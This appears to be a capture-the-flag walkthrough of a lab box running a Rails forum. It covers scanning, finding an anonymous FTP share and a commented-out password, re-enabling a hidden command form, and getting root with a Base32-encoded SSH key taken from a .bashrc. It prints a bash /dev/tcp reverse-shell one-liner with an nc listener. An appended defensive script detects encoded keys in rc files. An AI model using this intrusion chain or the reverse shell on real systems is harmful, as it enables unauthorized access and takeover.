Key takeaways
Observation
- Inspect the web page source for valuable information, e.g. comments and where resources are loaded from
- Inspect the server environment, e.g. environment variables and files such as .bashrc, for valuable information
Steps
Run an nmap scan. It shows an FTP service on port 21 that allows anonymous login, web applications on ports 8080 and 28080, and an SSH service on port 60022.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 11:20 UTC
Nmap scan report for #remote_ip#
Host is up (0.00095s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 14 14 11 4096 Nov 06 2020 forum
| ftp-syst:
| STAT:
| FTP server status:
| Connected to #remote_ip#
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host '#remote_ip#' is not allowed to connect to this MariaDB server
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.0 403 Forbidden
| Content-Type: text/html; charset=UTF-8
| Content-Length: 3102
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8" />
| <title>Action Controller: Exception caught</title>
|_http-title: ForumOnRails
28080/tcp open http Apache httpd 2.4.46 ((Unix))
|_http-server-header: Apache/2.4.46 (Unix)
|_http-title: html5-goku-en-javascript
| http-methods:
|_ Potentially risky methods: TRACE
60022/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 3072 76:61:5c:e1:8c:ca:14:e8:7a:63:ba:a3:46:9f:09:b3 (RSA)
| 256 e3:ed:fc:a8:10:d7:8e:b1:7c:de:a2:59:df:19:06:29 (ECDSA)
|_ 256 e5:dd:dd:a7:e3:ac:5f:b9:2b:4b:d0:27:e3:3c:c2:43 (ED25519)
Download the FTP server's files locally: it turns out to be a web application built with Ruby on Rails. A quick Google search shows it has not been maintained for many years. A brief look turns up nothing interesting, and searching for vulnerabilities matching the ruby and rails versions listed in the Gemfile also returned little of exploitable value.
wget -r --user="anonymous" --password="a" ftp://#remote_ip#
Try creating a user to obtain more information. Looking at the registration page source, there is a commented-out default password.
After registering, a post by admin.forum is visible; opening it reveals an email address. Combined, the username needed to log in is admin.forum@easysetting.com, and the likely password is the commented-out value in the screenshot above.
After logging in, clicking the server status button leads to the serverinfo page. Looking at its source reveals a commented-out form; judging from the input name, it may execute server commands, which could be used to establish a reverse shell.
Using the browser's web console to edit the HTML page, copy the commented-out part from the screenshot above into a new form element, remembering to remove the readonly attribute.
Start a listener locally with nc -nlvp 9000, enter bash -i >& /dev/tcp/#local_ip#/9000 0>&1 in the page, and submit to get a reverse shell.
Inspecting kathleen's .bashrc file gives the following (see screenshot); the commented-out section at the bottom is interesting, so copy it.
Use CyberChef to try decoding it: after trying Base64 and other encodings, it turns out to be Base32, which yields a private key.
Use the private key to SSH to the remote server as root: success.
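A defender-side check for the .bashrc finding above, added here as an example and not part of the original writeup: it scans a shell rc file for long base64/base32 tokens and flags any that decode to private-key material, the way the encoded key in kathleen's .bashrc would be caught. The sample .bashrc and the placeholder key are constructed for this example.

```python
import base64
import binascii
import re

# Constructed sample: a placeholder (not a real key), base32-encoded and hidden
# behind a comment marker, as the writeup found in ~/.bashrc.
FAKE_KEY = (
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    "PLACEHOLDER-NOT-A-REAL-KEY\n"
    "-----END OPENSSH PRIVATE KEY-----\n"
)
SAMPLE_BASHRC = (
    "# ~/.bashrc: executed by bash(1) for non-login shells.\n"
    "export PATH=$HOME/bin:$PATH\n"
    "alias ll='ls -alF'\n"
    "# " + base64.b32encode(FAKE_KEY.encode()).decode() + "\n"
)

# Marker that identifies decoded private-key material (PEM/OpenSSH header).
KEY_MARKER = re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----")
# Tokens long enough to be worth decoding. The base32 alphabet (A-Z, 2-7, '=')
# is a subset of the base64 alphabet, so one pattern catches both.
TOKEN = re.compile(r"[A-Za-z0-9+/=]{40,}")


def decode_candidates(token):
    """Yield (encoding, decoded_bytes) for every decoder that accepts the token."""
    for name, fn in (("base64", base64.b64decode), ("base32", base64.b32decode)):
        try:
            yield name, fn(token)
        except (ValueError, binascii.Error):
            continue


def find_encoded_keys(text):
    """Return [(line_no, encoding)] for lines whose long tokens decode to a key.

    A base32 token may also decode as base64 (to garbage), so every decoder is
    tried and only the one whose output carries the key marker is reported.
    """
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for token in TOKEN.findall(line):
            for name, data in decode_candidates(token):
                if KEY_MARKER.search(data):
                    hits.append((line_no, name))
                    break
    return hits


if __name__ == "__main__":
    print(find_encoded_keys(SAMPLE_BASHRC))  # [(4, 'base32')]
```

Run it over the rc files of every account on a host (not only the one being investigated) to catch the same pattern elsewhere.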
Overall, I tried linpeas, pspy64 and other tools to look for a way in, all without result; I blame my own lack of careful observation, which wasted a lot of time.
As for the other port, 28080, it serves just an animation; I did not dig into it and am not sure whether it is an alternative solution for this box.